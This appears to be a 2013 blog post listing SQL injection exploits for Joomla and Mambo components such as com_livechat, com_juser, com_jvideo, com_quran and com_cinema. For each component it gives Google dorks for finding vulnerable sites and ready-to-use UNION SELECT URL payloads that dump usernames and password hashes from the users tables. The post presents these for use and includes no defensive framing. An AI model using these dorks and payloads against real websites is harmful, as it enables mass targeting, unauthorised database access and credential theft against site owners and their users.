Monday, 04 November 2013

Joomla Exploits and Bugs



    Joomla Live chat



    Dork:
    Code:

    allinurl:option=com_livechat

    Exploit :
    Code:

    administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users

    administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users



    Joomla "option=com_juser"


    info http://milw0rm.com/exploits/8847

    Dork:
    Code:

    inurl:option=com_juser

    exploit:
    Code:

    index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--



    Joomla "com_jvideo"



    info from http://milw0rm.com/exploits/8821

    Dork :
    Code:

    inurl:option=com_jvideo
    inurl:com_jvideo

    exploit:
    Code:

    index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users





    Joomla com_ewriting





    Joomla com_simple_review Sql injection


    Dork:
    Code:

    inurl:"com_simple_review"

    Exploit:
    Code:

    index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--



    Joomla Qur'an component


    DORK :
    Code:

    inurl:"/index.php?option=com_quran"

    or

    allinurl:"com_quran"

    Exploit :

    Mambo
    Code:

    index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

    Joomla
    Code:

    index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--



    Joomla Component com_cinema SQL Injection


    DORK
    Code:

    allinurl: "com_cinema"

    EXPLOiT 1 :

    Code:

    index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*

    EXPLOiT 2 :
    Code:

    index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*



    Joomla Component joomradio Remote SQL Injection


    DORK:
    Code:

    inurl:com_joomradio

    Exploit :
    Code:

    index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
